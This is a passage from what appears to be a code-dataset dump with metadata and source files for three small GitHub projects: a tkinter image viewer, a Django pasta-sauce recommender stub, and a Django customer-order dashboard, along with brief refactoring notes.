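# Pixels darker than the threshold become black, the rest white
bw = gray.point(lambda x: 0 if x < 128 else 255, '1')
text = pytesseract.image_to_string(bw)
print(text)
```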
codingXllama/Image-Viewer
https://github.com/codingXllama/Image-Viewer
bf7eecdc7c86e6410f9aca669f727dc7d02559a7
f536ab51582e863fc05eea06e88f5760b7aac90b
2806f0fbc0950cd06146c1389dd3c87b36bfffab
refs/heads/master
2020-06-23T05:13:03.145186
2019-07-24T00:10:16
2019-07-24T00:10:16
198,526,387
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7149122953414917, "alphanum_fraction": 0.7438596487045288, "avg_line_length": 19.375, "blob_id": "a492b6fb324c6ef40fb06f097146feda7b11f884", "content_id": "bed8666e736080239e6996dc2834661f8dd2ae27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 81, "num_lines": 56, "path": "/app.py", "repo_name": "codingXllama/Image-Viewer", "src_encoding": "UTF-8", "text": "from tkinter import *\n# Importing Python Image Library\nfrom PIL import ImageTk,Image\n\nfrom PIL import ImageTk, Image\n\nwindow =Tk()\nwindow.title(\"Nature Image Viewer\")\n# window.geometry(\"800x600\")\n# logo=PhotoImage(file=\"x.xbm\")\nlogo= window.iconbitmap(\"@/home/x/Documents/GithubFiles/Image Viewer App /x.xbm\")\n# window.call('wm','iconphoto',window._w,logo)\n\n\nimg1=ImageTk.PhotoImage(Image.open(\"images/bg1.jpg\"))\nimg2=ImageTk.PhotoImage(Image.open(\"images/bg2.jpg\"))\nimg3=ImageTk.PhotoImage(Image.open(\"images/bg3.jpg\"))\nimg4=ImageTk.PhotoImage(Image.open(\"images/bg4.jpg\"))\nimg5=ImageTk.PhotoImage(Image.open(\"images/bg5.jpg\"))\n\n# Creating image list to store all images\nbgImageCollection=[img1,img2,img3,img4,img5]\nmyImg1_Label=Label(image=img1)\nmyImg1_Label.grid(row=0,column=0,columnspan=3)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Creating Buttons\nbackBtn=Button(window,text=\"<<\",bg=\"cyan\")\nexitBtn = Button(window, text=\"Exit Program\",command=window.quit, bg=\"red\")\nforwardBtn=Button(window,text=\">>\", bg=\"green\")\n\n\n# Adding the Button onto the window\nbackBtn.grid(row=1,column=0)\nexitBtn.grid(row=1,column=1)\nforwardBtn.grid(row=1,column=2)\n\n\nmainloop()" } ]
1
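app.py loads `bg1.jpg`–`bg5.jpg` into five separate variables. A sketch that builds the same collection with a loop, assuming the same `images/` layout:

```python
from tkinter import Tk, Label
from PIL import ImageTk, Image

window = Tk()
# Load images/bg1.jpg ... images/bg5.jpg into a list in one pass;
# PhotoImage must be created after Tk(), which is why the root comes first
bgImageCollection = [
    ImageTk.PhotoImage(Image.open("images/bg{}.jpg".format(i)))
    for i in range(1, 6)
]
Label(window, image=bgImageCollection[0]).grid(row=0, column=0)
window.mainloop()
```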
NaraJeamfry/pastasalsa
https://github.com/NaraJeamfry/pastasalsa
62f782ffa0093bd7a2e4d49a4771a7b3c2d7d35a
e98420f1022f3014e582e0d4e9453aebe5ce2e77
46fb0a814c3502d6064dd813791d471b3b2aba35
refs/heads/master
2020-04-26T14:08:22.751329
2019-03-03T18:48:50
2019-03-03T18:48:50
173,602,272
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7396449446678162, "alphanum_fraction": 0.7514792680740356, "avg_line_length": 32.79999923706055, "blob_id": "fe5c505a395e77fdfb368bf6a605e2e4d5094dc2", "content_id": "07a9adcb9767692ece62579402023e89fb0d9972", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "permissive", "max_line_length": 106, "num_lines": 5, "path": "/pasta/models.py", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass PastaType(models.Model):\n name = models.CharField(verbose_name='Pasta Name', max_length=50, null=False, blank=True, unique=True)\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.7411764860153198, "avg_line_length": 16, "blob_id": "58730e0d9d617c5fafc6aafd7413e73d021117d9", "content_id": "9903e473624292ed0f70c808050e1eaf1c6e305e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "permissive", "max_line_length": 33, "num_lines": 5, "path": "/pasta/apps.py", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass PastaConfig(AppConfig):\n name = 'pasta'\n" }, { "alpha_fraction": 0.8166666626930237, "alphanum_fraction": 0.8166666626930237, "avg_line_length": 29, "blob_id": "19eccdc9f942bd32c82b5c04c1fba0f0961ca3b0", "content_id": "5751bbc1f041aa67b0331b4913ced2cd9f626141", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "permissive", "max_line_length": 46, "num_lines": 2, "path": "/README.md", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "# pastasalsa\nRecomendador de salsas para cada tipo de pasta\n" } ]
3
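The pastasalsa README promises a sauce recommender, but the snapshot only defines `PastaType`. A hypothetical companion model — the `Salsa` name and fields are assumptions, not part of the repo — could pair sauces with pasta types like this:

```python
from django.db import models

# Hypothetical sketch: a Salsa model linked to the existing PastaType
class Salsa(models.Model):
    name = models.CharField(max_length=50, unique=True)
    # One sauce can suit several pasta shapes, and vice versa
    pasta_types = models.ManyToManyField('pasta.PastaType', related_name='salsas')
```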
AhmedFahmy-cyber/dash
https://github.com/AhmedFahmy-cyber/dash
8486927a8ac527f349fb4b42b1a5cb6e9e5129a3
be249ade7e07c8b917150fbe831da2d485bbe7fb
509ffa9697ac3cecce66741e5254d31ce21d0550
refs/heads/master
2022-12-16T19:39:58.782920
2020-09-22T14:02:45
2020-09-22T14:02:45
297,626,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141610145568848, "alphanum_fraction": 0.6141610145568848, "avg_line_length": 25.963350296020508, "blob_id": "39ec4bc97ed45e4239e0125ca0d7c10b8a666ea2", "content_id": "a000f118482b770b442a1d9ab089f8af57d5379b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5155, "license_type": "no_license", "max_line_length": 83, "num_lines": 191, "path": "/accounts/views.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.shortcuts import render,redirect\nfrom .forms import Orderform , Customerform ,Loginform ,Registerform\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate , login , logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin \nfrom django.views.generic import TemplateView \n\nfrom .models import *\n\n\n# Create your views here.\ndef registerPage(request):\n\n form = Registerform()\n if request.method == 'POST':\n form =Registerform(request.POST)\n if form.is_valid():\n user=form.save()\n username = form.cleaned_data.get('username') \n messages.success(request , 'Acount has been created for :' + username) \n return redirect('login')\n \n\n cotext ={'form':form} \n\n return render (request ,'accounts/register.html',cotext)\n\ndef loginPage(request):\n\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (request ,username = username , password = password)\n if user is not None:\n \n login(request,user)\n\n return redirect ('dashboard')\n else:\n messages.info(request , 'username or password not correct ' ) \n cotext ={}\n\n return render (request ,'accounts/login.html',cotext)\ndef logOutuser(request):\n \n logout(request)\n \n return redirect ('login') \n\n \n@login_required\ndef home(request):\n\n orders = Order.objects.all()\n customers = Customer.objects.all()\n total_orders = orders.count()\n customers_total = customers.count()\n Orders_Delivered = orders.filter(status='Deliverd').count()\n Orders_Pending = orders.filter(status='Pending').count()\n \n context = {\n 'customers': customers,\n 'orders':orders,\n 'Orders_Delivered':Orders_Delivered,\n 'Orders_Pending':Orders_Pending,\n 'customers_total':customers_total,\n 'total_orders':total_orders,\n }\n return render(request , 'accounts/dashboard.html' ,context)\n\n# class Home(LoginRequiredMixin,TemplateView):\n# template_name = 'accounts/dashboard.html' \n\n@login_required\ndef products(request):\n products = Product.objects.all()\n context = {\n 'products': products,\n }\n return render(request , 'accounts/products.html',context)\n\n# class Products(LoginRequiredMixin,TemplateView):\n# template_name = 'accounts/products.html' \n\ndef customers(request , pk_test):\n customer = Customer.objects.get(id=pk_test)\n orders = customer.order_set.all()\n order_count = orders.count()\n context = {\n 'customer': customer,\n 'orders':orders,\n 'order_count':order_count,\n }\n return render(request , 'accounts/customers.html',context)\n\ndef creatorder(request):\n\n form = Orderform()\n if request.method == 'POST':\n form = Orderform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_form.html',context)\n\n\ndef placeNeworder(request , pk):\n customer = Customer.objects.get(id=pk)\n form = Orderform(initial={'customer':customer})\n if 
request.method == 'POST':\n form = Orderform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_form.html',context)\n\n\n\n\ndef creatcustomer(request):\n \n form = Customerform()\n if request.method == 'POST':\n form = Customerform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_customer.html',context)\n\ndef updatecustomer(request , pk):\n customer = Customer.objects.get(id=pk)\n form = Customerform(instance=customer)\n \n if request.method == 'POST':\n form = Customerform(request.POST,instance=customer)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'customer':customer,\n 'form':form,\n\n }\n return render(request , 'accounts/creat_customer.html',context) \n\ndef updateorder(request , pk):\n order = Order.objects.get(id=pk)\n form = Orderform(instance=order)\n \n if request.method == 'POST':\n form = Orderform(request.POST,instance=order)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'order':order,\n 'form':form,\n\n }\n return render(request , 'accounts/creat_form.html',context) \n\n\ndef deleteorder(request , pk):\n order = Order.objects.get(id=pk)\n if request.method == 'POST':\n order.delete()\n return redirect('dashboard')\n \n context = {\n 'item':order,\n\n }\n return render(request , 'accounts/delete.html',context) \n\n" }, { "alpha_fraction": 0.6201834678649902, "alphanum_fraction": 0.6366972327232361, "avg_line_length": 24.952381134033203, "blob_id": "cc867de010728e1b3b83d0321dfd1dd21f2e945a", "content_id": "2bcffd9991b820092b8406a7104aa0f564440bfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/accounts/models.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\n\nclass Customer(models.Model):\n name = models.CharField(max_length=200 , null = True)\n email = models.CharField(max_length=200 , null = True) \n phone = models.CharField(max_length=200 , null = True)\n date_created = models.DateTimeField(auto_now_add=True,null=True)\n\n def __str__(self):\n\n return self.name\n\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=200 , null = True)\n\n def __str__(self):\n\n return self.name\n\n\nclass Product(models.Model):\n\n CATEGORY = (\n ('Indoor','Indoor'),\n ('Outdoor','Outdoor'),\n )\n name = models.CharField(max_length=200 , null = True)\n price = models.FloatField(max_length=200 , null = True)\n describtion = models.CharField(max_length=200 , null = True , blank=True) \n category = models.CharField(max_length=200 , choices = CATEGORY , null = True)\n date_created = models.DateTimeField(auto_now_add=True,null=True)\n tags = models.ManyToManyField(Tag)\n\n def __str__(self):\n\n return self.name\n\n\n\n\nclass Order(models.Model):\n\n STATUS = (\n ('Pending','Pending'),\n ('Deliverd','Deliverd'),\n ('Out for delivery','Out for delivery'), \n\n )\n\n\n customer=models.ForeignKey(Customer,null=True , on_delete=models.SET_NULL)\n product=models.ForeignKey(Product,null=True , on_delete=models.SET_NULL)\n status = models.CharField(max_length=200 , null = True , choices = STATUS ) \n date_created = 
models.DateTimeField(auto_now_add=True,null=True)\n\n def __str__(self):\n \n return self.product.name\n" }, { "alpha_fraction": 0.6387596726417542, "alphanum_fraction": 0.6387596726417542, "avg_line_length": 20.5, "blob_id": "993182f6d3614db70fcfe81c56e1a1e3c6c71e43", "content_id": "41ecba1cc524ab0e6252708bfd6ced8703b5b409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 63, "num_lines": 30, "path": "/accounts/forms.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm\nfrom .models import Order ,Customer \nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\nclass Orderform(ModelForm):\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass Customerform(ModelForm):\n \n class Meta:\n model = Customer\n fields = ['name','phone','email']\n\n\nclass Registerform(UserCreationForm):\n \n class Meta:\n model = User\n fields = ['username','email','password1','password2']\n\nclass Loginform(ModelForm):\n \n class Meta:\n model = User\n fields = ['username','password']\n" }, { "alpha_fraction": 0.6822977662086487, "alphanum_fraction": 0.6822977662086487, "avg_line_length": 49.117645263671875, "blob_id": "3674a51c5f11672721ee064f122f1e8251d14088", "content_id": "c862c561c90fefe926116e224dc79824b785c98e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 83, "num_lines": 17, "path": "/accounts/urls.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('register/', views.registerPage,name=\"register\"),\n path('login/', views.loginPage,name=\"login\"),\n path('logout/', views.logOutuser,name=\"logout\"),\n path('', views.home ,name=\"dashboard\"),\n path('products/', views.products ,name=\"products\"),\n path('customer/<str:pk_test>/', views.customers,name=\"customer\"),\n path('creat_order/', views.creatorder,name=\"creat_order\"),\n path('creat_customer/', views.creatcustomer,name=\"creat_customer\"),\n path('update_order/<str:pk>/', views.updateorder,name=\"update_order\"),\n path('update_customer/<str:pk>/', views.updatecustomer,name=\"update_customer\"),\n path('place_new_order/<str:pk>/', views.placeNeworder,name=\"place_new_order\"),\n path('delete_order/<str:pk>/', views.deleteorder,name=\"delete_order\"),\n]\n\n" } ]
4
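The update views in accounts/views.py all follow one ModelForm pattern: bind the form to an `instance`, re-bind with `request.POST` on submit, then save. A condensed sketch of that pattern, swapping bare `Model.objects.get` for `get_object_or_404` so a bad pk returns a 404 instead of a server error:

```python
from django.shortcuts import render, redirect, get_object_or_404

from .models import Order
from .forms import Orderform

# Sketch of the repo's update-view pattern, hardened against missing rows
def update_order(request, pk):
    order = get_object_or_404(Order, id=pk)
    form = Orderform(instance=order)            # pre-filled with current values
    if request.method == 'POST':
        form = Orderform(request.POST, instance=order)  # bind submitted data
        if form.is_valid():
            form.save()                         # updates the existing row
            return redirect('dashboard')
    return render(request, 'accounts/creat_form.html', {'form': form})
```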